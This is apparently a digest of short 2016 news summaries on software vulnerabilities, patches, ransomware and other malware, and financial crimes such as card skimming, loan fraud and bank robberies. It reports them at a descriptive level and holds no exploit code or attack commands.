Adobe to patch actively exploited Flash zero-day. Adobe reported April 5 that it will be releasing a patch for its Flash Player 18.104.22.168 and its earlier versions April 7 which will address a zero-day vulnerability after malicious attackers were seen actively exploiting the flaws. Customers were advised to ensure their Flash Players were updated to version 22.214.171.124 or later.
Two former senior executives of global financial services company charged in scheme to defraud clients through secret trading commissions on billions of dollars in securities trades. Two former executives of a Boston-based financial services company were charged in an indictment unsealed April 5 for their roles in a scheme where the duo and co-conspirators allegedly added secret commissions to billions of dollars of fixed income and equity trades performed for at least six clients of the bank’s transition management business, thereby overcharging the clients by millions of dollars. The indictment also alleges that from February 2010 to September 2011 the pair took action to hide the commission from the clients and other bank employees.
Researchers bypass patch for old IBM Java flaw. The founder and chief executive officer (CEO) of Security Explorations reported that a sandbox escape vulnerability in IBM Java, which was previously patched in 2013, could still be exploited by attackers after discovering the flaw could be abused by making minor modifications to the proof-of-concept (PoC) code published by the company in July 2013. A patch has yet to be released, but IBM was working to release a fix.
Top Firefox extensions can hide silent malware using easy pre-fab tool. Two U.S. security researchers at the Black Hat Asia 2016 security conference reported that Mozilla’s Firefox extensions were open to attacks that can compromise machines and pass automated and human security tests by reusing attack exploit weaknesses in the structure of Firefox extensions to disguise malicious activity as legitimate functionality.
Path traversal flaw found in ICONICS WebHMI. A German researcher discovered that ICONICS’ WebHMI product was plagued with a directory traversal flaw that could allow a remote attacker to access configuration files that stored password hashes and other information by sending a request to a vulnerable WebHMI product via the Internet. ICONICs have not released a patch and advised users to avoid exposing the product to the Internet.
HTTP compression continues to put encrypted communications at risk. Security researchers from the National Technical University of Athens reported at the Black Hat Asia 2016 security conference that they made improvements to the Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext (BREACH) attack to make it practical for hacking Transport Layer Security (TLS) block ciphers such as Advanced Encryption Standard (AES) by intercepting a victim’s Web traffic through a router connected to a wireless network.
Chrome extension caught hijacking users’ browsers. Google reported that it banned the Better History Chrome extension from its Web Store after users reported that the extensions redirected them to click on a Hypertext Transfer Protocol (HTTP) link that lead to an extra Web page showing several types of advertisements. The extra Web page collected analytics on users which could be later used to sell online to advertisers.
Google fixes another 40 security bugs in Android’s April update. Google released an Android Security Advisory patching 40 security flaws including 15 critical bugs in Android devices running versions 4.4.4 and higher, that could have allowed an attacker to root and permanently compromise the device. In addition, multiple remote code execution (RCE) flaws were patched in Dynamic Host Configuration Protocol Client Daemon (DHCPCD) service, Media Codec, Mediaserver component, and the libstagefright library, among other patched vulnerabilities.
iOS app patching tool “rollout” prone to abuse. Security researchers from FireEye reported that another quick-patching solution, Rollout.io, used for Apple’s iOS applications and runs on 35 million devices could be abused by malicious hackers to integrate a malicious third-party ad software development kit (SDK) into a legitimate app and potentially turn harmless iOS apps into malware.
Thousands of cards compromised in ATM scam. Authorities announced April 1 that a man was charged after he allegedly placed skimming devices on Wells Fargo ATMs throughout San Diego County, compromising at least 4,870 credit and debit cards with losses exceeding $428,000 through the use of counterfeit cards. The man also withdrew money from customer accounts, purchased merchandise from local Walmarts, and transmitted over $114,000 in funds via MoneyGrams to Jordan, Belgium, China, Bulgaria, and Moldova.
Elusive Midday Bandit robs 11th bank: FBI. The FBI is searching for a man dubbed the “Midday Bandit” who is suspected of robbing the MB Financial Bank branch in Oak Lawn, Illinois, March 31. Authorities stated that the man is suspected of robbing 10 other Chicago-area banks since June 2014.
Ex-furniture company exec pleads guilty in $18M loan fraud. The former chief financial officer (CFO) of New Jersey-based Munire Furniture Inc., and an affiliated Indiana company pleaded guilty to Federal charges April 1 after the CFO falsified the companies’ financial conditions by inflating sales and revenue numbers beginning in 2011 in order to get $17 million in loans from a Manhattan bank and $1 million in municipal loans from Gas City, Indiana, so the companies could continue business. Officials stated that the companies defaulted on the $18 million loans.
Authentication flaw in Microsoft accounts gets researcher $13,000 reward. Microsoft patched a cross-site request forgery (CSRF) flaw in its main authentication system after a security researcher found attackers could gain access to its Azure, Outlook, and Office servers by altering the “wreply” parameter and sending authentication tokens to a hacker-controlled Web site due to improper input filtering on the “wreply” Uniform Resource Locator (URL).
Romanian hacker “Guccifer” appears in U.S. court. A Romanian national was extradited to the U.S. for a period of 18 months after U.S. authorities stated the man allegedly hacked into the email and social media accounts of two former presidents, a former cabinet member, a former presidential advisor, and a former member of the U.S. Joint Chiefs of Staff, among other people, and released victims’ personal information including private emails, personal photographs, and medical and financial data from December 2012 – January 2014.
Hackers can unlock any HID door controller with one UDP packet. A security researcher from Trend Micro discovered a design vulnerability in HID Global’s door controllers, specifically in VertX and Edge products, that can allow an attacker to send one malicious User Datagram Protocol (UDP) request to a door and automatically unlock the door and/or deactivate the alarm. An attacker could execute remote commands on the device with root privileges due to the two devices running a special daemon titled, discoveryd, which communicates to UDP network packets on port 4070 with information about the device.
Four arrested in Calhoun County for allegedly possessing over 100 fraudulent credit cards. Authorities from the Calhoun County Sheriff’s Office in Michigan announced April 1 that 4 Chicago-area residents were arrested the week of March 28 after police found about 150 fraudulent credit cards from other countries in the group’s vehicle. Police were alerted to the suspects’ vehicle after a gas station attendant notified the police about possible credit card fraud.
200 fake credit cards set off bomb detector at Midway, prosecutors say. Officials at Chicago Midway International Airport discovered a total of 200 fraudulent gift cards and debit cards March 29 after the magnetic strips on the cards triggered a bomb detector in airport security. Authorities stated that the fraudulent cards were found wrapped in shoes and socks.
Code execution flaw found in Lhasa decompression library. Lhasa released version 0.3.1 for its open source tool and library product addressing an integer underflow vulnerability after Cisco TALOS researchers found hackers could exploit the flaw for arbitrary code execution by tricking victims into opening a specially crafted file, as well as through file scanning systems that leverage the vulnerable library to read the content of LZH and LHA files.
Rokku ransomware uses QR codes to help you pay for your files. Security researchers from Avira discovered a new ransomware named Rokku that encrypts victims’ files while attaching the “.rokku” extension via spam emails embedded with malicious email attachments that will execute the ransomware’s encryption process when opened.
SideStepper attack targets corporate iOS devices. Security researchers from Check Point discovered a new attack method dubbed SideStepper that targets Apple iOS devices used in enterprise environments and are enrolled in Mobile Device Management (MDM) setups, which could allow attackers to bypass iOS security protections and install malware on a device by sending a malicious configuration profile via email, instant messaging (IM), or short message service (SMS) to the device, through the use of a legitimate enterprise certificate to install malicious apps via a trivial Man-in-the-Middle (MitM) attack.
Police bust major credit card fraud operation. Officials from the Atlanta Police Department and the U.S. Secret Service are investigating a half-million dollar credit card fraud operation after Atlanta police discovered approximately 366 fraudulent credit cards with different numbers, multiple credit card-making machines, and $330,000 worth of computers in an Atlanta apartment March 30. Officials stated the suspects allegedly purchased computers at Best Buy with the fraudulent credit cards and sold the devices internationally, and that they committed fraud using aliases at banks in the U.S., Germany, Denmark, and the Bank of China.
California wholesale executive pleads guilty for role in $9 million bank fraud scheme. The former vice president of Eastern Tools and Equipment, Inc., in Ontario, California, pleaded guilty March 30 to Federal charges after he and co-conspirators defrauded East West Bank in Pasadena of $9 million from 2007 – 2012 by making material misrepresentations to the bank about the company’s accounts receivable and financial statements, creating shell corporations to act as suppliers and retailers doing business with Eastern Tools, and defaulting on the promissory note issued by the bank. Officials stated that the executive and his co-conspirators prolonged the scheme by opening post office boxes, phone accounts, and email accounts claiming to be associated with the shell retail companies in order to make them appear as independent entities to East West Bank.
Malware detection bypass vulnerability found in Cisco firepower. Cisco released software updates fixing a high severity vulnerability after a researcher found that the flaw was caused by improper input validation of fields in Hypertext Transfer Protocol (HTTP) that could allow a remote, unauthenticated attacker to bypass malicious file detection and block security features by crafting an HTTP request and sending it to the victims’ system.
Patch out for ‘ridiculous’ Trend Micro command execution vuln. Trend Micro released a patch that fixed a command execution vulnerability for systems running its Maximum Security, Premium Security or Password Management software after a security researcher from Google’s Project Zero found a remote debugging server was running on customers’ machines. Officials stated the patch was not fully complete, but will fix most critical issues with the software.
Security bug allowed attackers to send malicious emails via PayPal’s servers. PayPal Holdings, Inc., patched a flaw in one of its automatic emailing application after a security researcher from Vulnerability Lab found that attackers could add malicious code to an account’s username which were embedded in the emails sent to other recipients. The flaw could allow an attacker to execute session hijacking and redirection to external sources, and trick users into clicking a malicious link that prompts victims to enter their PayPal credentials.
Police: 2 men wanted in ATM skimming device incidents in Brooklyn, Queens. Officials from the New York City Police Department and the FBI are searching March 29 for two men suspected of installing and removing ATM skimming devices at five different TD Bank locations in Brooklyn and Queens, New York, from September 2015 – November 2015.
Repeated DDoS attacks force Coinkite Bitcoin wallet to close down web service. One of the first Web-based bitcoin wallet services, Coinkite reported March 28 that it will be closing down its Web-based wallet service with the intention of solely developing its hardware products after their services received constant denial-of-service (DDoS) attacks for the past three years. The company warned users of potential phishing scams that will trick users into revealing their account credentials or tricking users into sending bitcoins to the wrong account.
Montgomery man pleads guilty in $2.5 million fraud case. Two Pennsylvania men and a New York resident pleaded guilty March 28 to Federal charges alleging that the trio defrauded banks from 2007 – 2015 by lying about their income in order to secure over $2.5 million in fraudulent loans and lines of credit from banks and credit unions, then defaulting on the loans. Officials from the U.S. Attorney’s Office for the Southern District of New York stated that the trio used the loans to pay off credit card purchases, business expenses, and other loans to conceal the fraud.
Connecticut insurance salesman convicted of tax fraud. The U.S. Department of Justice Tax Division announced March 28 that a Connecticut-based insurance salesman was found guilty of tax fraud after he attempted to obstruct the U.S. Internal Revenue Service (IRS) by filing 3 false tax returns for 2007, including a fraudulent request for a $14 million refund, sending false and threatening correspondence to the IRS to defeat its assessment, collection, and investigative efforts, and by submitting threatening correspondence to those insurance companies that cooperated with IRS activities. Officials stated the salesman also established nominee entities to divert his insurance commissions in order to conceal assets and prevent the IRS from collecting on his tax liabilities.
“Vaccine” available for CTB-Locker, Locky, TeslaCrypt. French cybersecurity company, Lexsi released a “vaccine” that can improve users’ computer defenses against ransomware including CTB-Locker, Locky, and TeslaCrypt and stated that users can create a specific mutex or registry key, or change the simple system parameter as long as the modification does not pose an inconvenience to other users.
Thousands of printers “hacked” to spew anti-semitic flyers. A security researcher discovered that hundreds of thousands of Internet of Things (IoT) printers were susceptible to attacks after finding that many IoT printers did not require authentication when connecting to the device. The researcher found the vulnerability when using Masscan, a mass Internet Protocol (IP) scanner that collected all vulnerable printers in its vicinity.
vBulletin servers hacked, admins force password reset for all users. A company official for vBulletin.org and vBulletin.com reported that its Web domains went offline from March 24 – March 25 for a non-scheduled maintenance outage and forced its users to reset their passwords after hackers accessed the company’s vBulletin Germany (VGB) servers that carry user information. The exploit was allegedly reported to have used the content management system (CMS) used to run the company’s VGB’s presentation site.
TreasureHunt PoS malware linked to illegal credit card sharing forum. Researchers from FireEye reported that a new strain of point of sale (PoS) malware, dubbed TreasureHunt was being used by BearsInc, a cyber-crime group, to power its malicious campaign targeting small businesses and banks in the U.S. that have not yet transitioned to the new Europay, MasterCard, and Visa (EMV) chip and Personal Identification Number (PIN) card system. The new strain adds a registry key for boot persistence to a device, scans the device’s memory for credit card information, and encodes and sends the data to a command and control (C&C) server.
Miami men arrested for possessing over 100 fraudulent bank cards. Two Florida men were arrested in Henry County, Georgia, March 22 after authorities found 187 fraudulent bank cards and 2 electronic card skimming devices in the pair’s vehicle after a Police Department K-9 unit detected the illicit materials during a traffic stop, prompting a search of the vehicle.
Securities professional charged with defrauding institutional investors. The U.S. Securities and Exchange Commission charged a New York-based securities professional March 28 after he allegedly solicited approximately $95 million from 2 institutional investors by offering promissory notes issued by Irving Place III SPV LLC, a shell entity with no legitimate business operations, obtained a $25 million investment in November 2015 and used the funds for personal use, and attempted to solicit an additional $70 million from 2 investors using false and misleading statements. The U.S. Attorney’s Office for the Southern District of New York announced March 28 parallel criminal charges against the securities officer.
Honolulu man arrested in credit card scheme involving cyber black market. FBI officials arrested a man from Hawaii March 28 after he allegedly purchased information on the cyber black market to obtain credit cards from Russia, China, and Vietnam as part of an elaborate scheme that used online credit card applications, temporary mail forwarding requests, burner phones, and shopping sprees to steal the identities of over 40 people, open 80 bank accounts with the stolen information, and accumulate over $100,000 in fraudulent credit card activity.
Flaw in Truecaller Android app leaves data of millions of users exposed. Security researchers from Cheetah Mobile Security Research Lab discovered a remotely exploitable flaw in the Truecaller app that exposed the personal information of millions of users and could allow attackers to modify users’ account settings through the application’s international mobile equipment identity (IMEI) code. Attackers could write scripts through query random IMEI codes to collect a user’s data and subsequently, use the collected data in spam or phishing campaigns.
Zen Cart patches multiple XSS vulnerabilities. Zen Cart released an updated version to its online open source shopping cart application, Zen Cart 1.5.4 that patched several cross-site scripting (XSS) vulnerabilities after researchers from Trustwave found the flaws in the administrative section of Zen Cart that could result in access to cookies, sensitive information, or site defacement. Researchers advised users to upgrade their software to the latest version to avoid the flaws.
Facebook fixes Instagram issue that allowed account takeover. A Belgian security researcher discovered critical flaws in Instagram that could have allowed an attacker to reset emails attached to an account and reset the account’s password after Facebook was discovered printing sensitive Instagram user information on the Web page. In addition, an Insecure Direct Object Reference vulnerability allowed unauthenticated users to access other users’ information and could potentially allow an attacker to do the same.
SEC halts fraud by manager of investments in pre-IPO companies. The U.S. Securities and Exchange Commission (SEC) announced March 25 charges and asset freezes against a New Jersey-based fund manager and 2 share-marketing companies, Saddle River Advisors and SRA Management Associates, after they allegedly stole $5.7 million from investors, diverted millions more to improper and undisclosed uses, failed to register the share offerings with the SEC, and concealed the illicit activity by avoiding outside reviews of the funds, indiscriminately transferring money to more than a dozen bank accounts, and failing to provide investors with financial statements. Officials stated that the manager raised more than $53 million from investors through the 2 funds and used the money to pay off earlier investors, prop up other funds, and pay family-related expenses, thereby leaving his firms unable to buy shares promised to investors.
PowerWare ransomware abuses PowerShell, Office macros. Security researchers from Carbon Black reported a new fileless ransomware, PowerWare can allow attackers to disguise malicious commands as legitimate computer activities and execute malicious actions by abusing PowerShell, a core utility for Microsoft Windows systems. The malware was distributed via malicious Word documents that uses embedded macros to send “cmd.exe” to a target’s computer.
Flaw in StartSSL validation allowed attackers to get SSL certs for any domain. A security researcher discovered a domain validation flaw in Web service, StartSSL certificate authority (CA) that could allow an attacker to receive Secure Sockets Layer (SSL) certificates for any desired domain by capturing the Hypertext Transfer Protocol (HTTP) request sent to the server and modifying the included parameters to send the certificate to their own personal email. StartSSL reported they patched the flaw.
WordPress attacked 3.5 times more often than non-CMS sites. Security firm, Imperva released a report stating that Web attacks in 2015 increased greatly after the company analyzed about 7 generic attacks and more than 24 million alerts for 200 Web applications, which revealed that Structured Query Language (SQL) injections tripled and cross-site scripting (XSS) attacks doubled within the year. In addition, the report found many attacks were in Web applications running on standard Content Management System (CMS) platforms, which were attacked three times more than non-CMSs applications, among other findings.
U.S. Federal Agencies vulnerable to data threats: Survey. Vormetric released its 2016 Data Threat Report which detailed that 90 percent of Information Technology (IT) security executives from large international organizations, including more than 100 executives in the U.S. Federal government expressed their organizations were vulnerable to data threats and that 61 percent of executives admitted that their organization had previously suffered a data breach. The report stated that many entities were planning to increase spending on sensitive data protection, invest in data-at-rest defenses, and implement more efficient data security tools.
Petya ransomware encrypts entire hard drives. Security researchers from G DATA SecurityLabs found a new threat, dubbed Petya ransomware that has been allegedly encrypting company’s entire hard drives and locking users out of their systems via a malicious Dropbox download link, included in an email sent to Human Resources (HR) departments, that is embedded with an executable file that causes the computer to crash and enables the ransomware to manipulate the Master Boot Record (MBR) to ultimately control the computer system. Security researchers advised HR department employees to take extra precaution when offered Dropbox links.
Brazilian trojan conceals malicious code in PNG image. Security researchers from Kaspersky Lab found a new malware delivery method was being used by attackers to avoid detection after finding that attackers were distributing a Portable Network Graphics (PNG) image embedded with malicious code via an email that contains a clean PDF file, which holds a link to a .zip file with the malicious image. Researchers found that the PNG image cannot be executed without its launcher; and therefore, it cannot be the main infector.
Louisiana check cashers plead guilty to conspiracy, tax charges and agree to forfeit $4.12 million. The two owners of VJ Discount Inc., in Kenner, Louisiana, pleaded guilty March 24 to Federal charges after the pair acted with co-conspirators to defraud the U.S. government and impair the Internal Revenue Service (IRS) by cashing fraudulently obtained tax refund checks at elevated rates, filing false reports with the government to conceal the illicit activity, and filing false tax returns that underreported business and individual income to the IRS, despite third-party check deposits totaling more than $172 million from 2011 – 2013. As part of the guilty pleas, the duo agreed to forfeit $4.12 million dollars.
New York man indicted in $17 million Microcap stock manipulation scheme. The founder of a New York-based registered broker-dealer was indicted on Federal charges March 23 after he allegedly orchestrated a $17.2 million pump-and-dump stock market manipulation scheme where he and co-conspirators artificially inflated the stock prices of Raven Gold Corporation and Kentucky USA Energy Inc., by pumping the price of the two companies’ shares through manipulative trading, dumping the stocks, and selling large amounts of the shares to investors at inflated rates, causing the companies’ stock prices to drop and investors to suffer losses. Officials stated that two Canadian stock promoters have pleaded guilty for their involvement in the scheme.
7 Iranians indicted for cyber attacks on US banks and a dam. The U.S. Department of Justice reported March 24 that 7 Iranian computer specialists, allegedly sponsored by Iran’s Islamic Revolutionary Guard Corps, were charged for conducting several coordinated distributed denial-of-service (DDoS) attacks against 46 major companies which primarily targeted the U.S. financial sector from 2011 – 2013. The attacks disabled victims’ bank Web sites, prevented customers from accessing online accounts and cost banks tens of millions of dollars in remediation.
Cisco patches serious DoS flaws in IOS software. Cisco released patches for six high severity denial-of-service (DoS) flaws in its IOS, IOS XE, and Unified Communications Manager (UCM) software including a flaw that can allow an unauthenticated attacker to cause a memory leak, eventually causing the infected device to reload, and a vulnerability affecting the DHCP version 6 relay feature of which can cause the affected device to reload by sending specially crafted DHCPv6 relay messages.
EC Council website hacked to serve Angler Exploit Kit. Security researchers from Fox-IT warned users that the security certification provider, EC Council was unknowingly distributing the Angler exploit kit (EK) after discovering that malicious code was embedded at the bottom of EC Council’s iClass Web site for Certified Ethical Hacker (CEH) certification, which redirected users to a Web page with the Angler EK. Researchers suspected a security flaw in the Web site and notified the company of the exploit.
Woman captures video of ‘Bearded Bandit’ arrest. The FBI arrested a man dubbed the “Bearded Bandit” in Brentwood, California, March 23, after he allegedly committed 15 bank robberies that totaled $28,000 in theft from the San Francisco Bay Area.
‘Bad Breath Bandit’ strikes again at northern California bank, police say. Authorities are searching for a man dubbed the “Bad Breath Bandit” who is suspected of robbing the El Dorado Savings Bank in Georgetown, California, March 21 at gunpoint. Officials stated that the man is tied to four other bank robberies in northern California in 2014.
Valley City State prof faces ID theft charges after police seize 200 credit cards. A Chinese citizen working as an assistant professor at Valley City State University in North Dakota and Johns Hopkins University in Maryland was arrested March 22 after authorities discovered over 200 credit and gift cards, computers, electronic storage devices, and suspected counterfeit merchandise, among other items, in the professor’s apartment and office. The investigation began after authorities received anonymous photographs revealing the large number of credit cards bearing different names in the suspect’s apartment.
Miami businessman pleads guilty to foreign bribery and fraud charges in connection with Venezuela bribery scheme. The owner of multiple U.S.-based energy companies pleaded guilty March 22 to foreign bribery and Federal fraud charges after he and a co-conspirator participated in a scheme to illicitly secure energy contracts from Venezuela’s state-owned energy company, Petroleos de Venezuela S.A. (PDVSA) by paying bribes and other things of value to PDVSA officials in order to win lucrative energy contracts, ensure spots on PDVSA approved vendor lists, and be given payment priority ahead of other vendors from 2009 – 2015. Officials stated that four other individuals pleaded guilty for their participation in the scheme.
FBI seeks help nabbing bank robber known as ‘Count Down Bandit’. The FBI is searching March 23 for a man dubbed the “Count Down Bandit” who is suspected of committing at least seven robberies at banks around northern New Jersey, with his most recent taking place March 8. The suspect has reportedly targeted Hudson City bank branches.
Sophisticated USB trojan spotted in the wild. Researchers from ESET reported that an advanced data-stealing universal serial bus (USB) trojan dubbed, “USB Thief” was found in the wild and can compromise a system by injecting itself into the execution chain of portable versions of popular applications and disguising itself as a plugin or a Dynamic Link Library (DLL) file. The threat is bound to a single USB drive and was reported to have four executables and two configuration files that enable it to avoid detection and prevent researchers from detecting, copying, and analyzing the malware.
OS X zero day bug allows hackers to bypass system integrity protection. A security researcher discovered a non-memory corruption flaw in Apple Inc.,’s operating system (OS) X that could allow an attacker to compromise OS X and iOS systems by executing arbitrary code on any binary and escalating attackers’ privileges to root and/or bypass Apple’s System Integrity Protection feature. Researchers stated the zero-day vulnerability was not exploited by attackers, but the flaw could potentially be used in highly targeted or State sponsored attacks.
Oracle reissues patch for two-year-old Java. Oracle Corporation released updates for two of its Java SE products addressing a sandbox escape flaw after researchers discovered the previously patched flaw could be bypassed to allow a remote, unauthenticated attacker trick users into visiting a malicious Web site. The new update successfully patches the flaw within Java SE 8 Update 77 and Java SE 7 Update 99.
Bearded bandit robs Lafayette bank Monday. Authorities are searching March 22 for a man suspected of committing a string of robberies at multiple banks in the San Francisco Bay Area including a Chase Bank branch and a Bank of Stockton branch March 21. The suspect is also tied to a March 11 robbery at a Wells Fargo bank branch in Concord.
Microsoft, Samba preparing patch for severe “Badlock” flaw. Developers from Microsoft Corporation and Samba worked to patch a critical vulnerability dubbed “Badlock” after discovering that the flaw could affect several versions of Windows and Samba software. Researchers will release patches and details for the vulnerability April 12.
‘Syrian Electronic Army’ members face hacking charges. The U.S. Department of Justice charged three members of the Syrian Electronic Army for unauthorized access to computers, receiving proceeds of extortion, money laundering, and wire fraud after the trio allegedly deployed a spear-phishing attack in support of the Syrian government and president which aimed to compromise the computer systems of the U.S. Federal Government, a U.S. Marine Corps recruiting site, international organizations, media organizations, and other private-sector entities.
CCleaner 5.16 released with Windows 10 Edge, Chrome, and Opera Improvements. Piriform released CCleaner 5.16, its privacy and cleaning tool system, which includes bug patches and improvements to Google Chrome cleaning, Microsoft Edge temporary file cleaning, and Opera browser application cache cleaning that aims to help users clear and protect their information after closing an application or using a browser.
Microsoft adds new feature in Office 2016 that can block macro malware. Microsoft Corporation reported that it will be implementing a new feature in its Office 2016 suite that will allow corporate network administrators to stop the execution of macro malware that steal content from untrusted sources. The new feature can be controlled via Group Policy and configured per application.
Miami man pleads guilty to multimillion-dollar scheme to defraud commercial lenders and U.S. Export-Import Bank. Officials from the U.S. Department of Justice and the Export-Import Bank of the U.S. (EXIM) announced March 21 that a Miami man pleaded guilty for his role in a scheme to defraud 2 commercial lenders and EXIM out of more than $11 million after he and co-conspirators utilized companies they controlled to create fictitious invoices for the sale of merchandise, factored the invoices to 2 Miami-area lenders, transferred the funds they received through multiple bank accounts under their control, and used the proceeds to pay off prior factored invoices from 2007 – 2012. Officials stated that the man extended the scheme by creating false invoices and shipping documents to obtain a loan guaranteed by EXIM, and later defaulted on the loan, causing a $2 million loss to the U.S.
Turkish national arrested for conspiring to evade U.S. sanctions against Iran, money laundering and bank fraud. The U.S. Department of Justice announced March 21 that a dual citizen of Turkey and Iran was arrested March 19 and indicted on Federal charges for his alleged role in an international scheme to circumvent U.S. economic sanctions by conducting hundreds of millions of dollars-worth of transactions on behalf of the Iranian government and Iranian businesses, laundering the proceeds, and concealing the true nature of the illicit transactions through a network of companies located in Iran and Turkey, and elsewhere from U.S. banks and the U.S. Department of the Treasury’s Office of Foreign Assets Control between 2010 – 2015. Two other Iranian citizens included in the indictment remain at large for their alleged involvement in the scheme.
Google issues emergency patch for critical Android rooting exploit. Google released an emergency security patch addressing an elevation of privilege vulnerability that affects all Android devices running kernel versions 3.4, 3.10, and 3.14, which could allow local malicious applications to execute arbitrary code in the kernel by rooting applications that were previously installed by customers.
“Surprise” ransomware uses TeamViewer to infect victims. A new ransomware dubbed Surprise was discovered to be infecting users’ personal computers (PCs) by using poorly secured TeamViewer installations and encrypting victim’s files via an AES-256 algorithm, using an RSA-2048 to secure each file’s encryption keys with a master’s key, and uploading the file to the command and control (C&C) server. Once an attacker encrypts a target’s file, a “.surprise” extension is added to all files and the victims are given a ransom note.
Two arrested after boarding plane with bundles of fake credit cards, detectives said. Officials from the Broward Sheriff’s Office announced March 18 that 2 men were arrested at Fort Lauderdale-Hollywood International Airport March 16 after security officials detected a total of 186 fraudulent Vanilla Visa and Walmart Stores, Inc., gift cards in the pair’s checked luggage. Authorities stated that 83 of the cards were re-encoded with real credit card numbers, some of which were issued by banks to several card-holders in Indiana.
iOS zero-day breaks Apple’s iMessage encryption. Researchers from Johns Hopkins University discovered a zero-day flaw in Apple’s operating system (iOS) encryption which could allow attackers to decrypt intercepted iMessages in iOS 9 and older iOS versions. Apple Inc., partially patched the vulnerability in iOS 9, but reported that the flaw will be completely patched in iOS 9.3 March 21.
Symantec patches high risk vulnerabilities in Endpoint protection. Symantec released a security update for its Symantec Endpoint Protection (SEP) product which patched three high risk security flaws including a cross-site request forgery (CSRF) vulnerability, a Structured Query Language (SQL) injection vulnerability, and a bypass security flaw that could allow authorized users with low privileges to gain elevated access to the Management Console, as well as enable attackers to achieve arbitrary code execution on a victim’s device by bypassing the SEP Client security mitigations, among other actions.
There were over 16,000 software bugs detected in 2015. Secunia researchers released a report detailing that in 2015, 16,081 flaws were found in 2,484 software applications from 263 different vendors including Google, Adobe, Microsoft, and Oracle, among others, and that 57 percent of the vulnerabilities could be exploited from a remote network. The report stated that there was a 2 percent increase in vulnerabilities from 2014 – 2015.
Nevada man convicted of perpetrating nationwide multi-million dollar fraud scheme. Officials from the U.S. Department of Justice’s Tax Division announced March 17 that a Nevada man was found guilty of orchestrating a $2 million Nigerian oil investment fraud scheme from 2004 – 2012 after he and a co-conspirator mislead investors by falsely claiming that the invested money would be used to purchase an oil refinery in the Bahamas and used for the production, refinement, and shipment of crude oil from Nigeria to the Bahamas. The money was instead used for personal expenses or transferred to unknown bank accounts in China, and officials stated the man also falsely claimed individual unemployability compensation benefits from the U.S. Department of Veterans Affairs.
Dallas FBI searching for ‘Bad Hair Bandit’ in string of Preston Road bank robberies. The Dallas FBI is searching March 17 for a man dubbed the “Bad Hair Bandit” suspected of committing five robberies or attempted robberies at the BB&T Bank, Comerica Bank, Bank of Texas, and two separate BBVA Compass Banks in Dallas since January.
Stagefright exploit puts millions of Android devices at risk. NorthBit released a report addressing a vulnerability dubbed Metaphor, which affects Android versions 2.2. – 4.0, as well as 5.0 and 5.1, after security researchers discovered a new way to exploit a previously patched remote code execution vulnerability found in Stagefright, Android’s mediaserver and multimedia library. Researchers reported attackers tricked victims into clicking a malicious link sent via email that would execute the exploit.
iCloud account hijacking scam is as bad as ransomware. Security researchers discovered that attackers could hack a victim’s Apple iCloud account and use the device’s security features to create malicious actions against the victim by using the Find my Mac feature and Find my iPhone feature. The two features enabled attackers to lock the device and display a ransomware message on a target’s device.
2 men indicted by Federal grand jury for using skimming device at Chesterfield bank. Two Estonian men were arrested and indicted by a Federal grand jury March 15 for using a skimming device to steal the financial information of up to 40 people at a Bank of America in Richmond. Authorities have tied the pair to a scheme which targeted SunTrust, Bank of America, and State department credit union banks in Maryland and Virginia after a subsequent search of the duo’s apartment revealed 94 magnetic-strip cards, $32,000 in cash, and ATM skimmer hardware.
Oregon man charged with using fictitious financial instruments and failing to file income tax returns. Officials from the U.S. Department of Justice’s Tax Division announced March 15 charges against an Oregon man after he allegedly devised and participated in a scheme to defraud U.S. financial institutions out of monies by making, presenting, and transmitting more than 300 fraudulent financial instruments purportedly worth over $100 trillion and promoted the instruments as ways to pay off debts and Federal income taxes through seminars and private client consultations from 2008 – 2015. The suspect also failed to file income tax returns and report his income to the U.S. Internal Revenue Service for several years.
Middle-aged US bloke pleads guilty to iCloud celeb nude photo hack. The U.S. Department of Justice reported March 16 that a man from Lancaster pleaded guilty to one count of unauthorized access to a protected computer after he illegally accessed and downloaded images from 50 iCloud accounts and 72 Gmail accounts via phishing attacks from November 2012 – September 2014.
AceDeceiver iOS trojan abuses Apple’s Fairplay DRM System to infect users. Researchers from Palo Alto Networks reported that a new iOS trojan dubbed AceDeceiver was targeting Apple, Inc.’s FairPlay digital rights management (DRM) system and can allow attackers to infect both jailbroken and non-jailbroken devices by using a FairPlay Man-in-the-Middle (MitM) attack to spread pirated apps by allowing attackers to request authorized code and distribute the code to any device of choice, enabling hackers to act as a middleman between a victim’s personal computer (PC) and the App store.
Malvertising campaign hits MSN.com, NY Times, BBC, AOL. Security researchers from Malwarebytes and Trustwave discovered that a malvertising campaign was targeting popular Web sites such as the New York Times, Microsoft’s MSN Web site, and The Hill, among other Web sites, by using the ad networks hosted on each Web site to serve malicious ads that could lead users to other sites hosting an exploit kit (EK).
Database of abandoned iOS app exposes details for 198,000 users. Security researchers from MacKeeper discovered that the MongoDB database associated with the discontinued Kinoptic iOS app exposed 198,000 users’ information online including usernames, email addresses, and hashed passwords, among other data, via a default MongoDB configuration that allowed the public to access its content without any form of authentication.
SEC charges operator of Ponzi scheme that claimed to offer “bridge loans” to Jamaican businesses. The U.S. Securities and Exchange Commission announced March 15 that Federal officials arrested a Miami resident March 13 for allegedly operating a $10 million Ponzi scheme where he solicited over 21 investors across 6 States and Washington, D.C. by claiming their money would be used for “bridge loans” to Jamaican businesses awaiting funds from bank loans, and touting investment opportunities and investment-funded projects in Jamaica via YouTube videos. The investment funds were instead used to pay other investors and for personal expenses.
Securities and Exchange Commission: Bakersfield Investment Club a fraud. The U.S. Securities and Exchange Commission announced the week of March 7 charges against the chief executive officer (CEO) of Bakersfield Investment Club in California after he ran a $11 million fraudulent investment scheme where he purchased real estate and businesses with money from over 400 investors and titled the properties in his name in order to defraud investors and use the money to fund personal expenses.
Radamant C&C server manipulated to spew decryption keys. Security researchers from InfoArmor reported that a flaw in Radamant ransomware’s command and control (C&C) server could potentially allow researchers to decrypt victims’ files without requiring user interaction by registering the infected machine within the malware control center via a Hypertext Transfer Protocol (HTTP) POST request. Researchers reported the request needs to contain public and private encryption keys, as well as a unique identifier of the bot to bypass the filter and avoid additional vulnerability exploits.
VMware vRealizes that vRealize has XSS bugs on Linux. Virtzilla released its first maintenance updates in version 7.0.1 of its vRealize Automation product in Linux systems after discovering that a pair of cross-site scripting (XSS) vulnerabilities could compromise a user’s workstation.
Amex investigates possible data breach. American Express officials reported that it is investigating a potential data breach in California after one of its third-party service providers was compromised and potentially exposed customer names, account numbers, expiration dates, and other personal information. Officials reported the investigation was conducted as a precautionary measure.
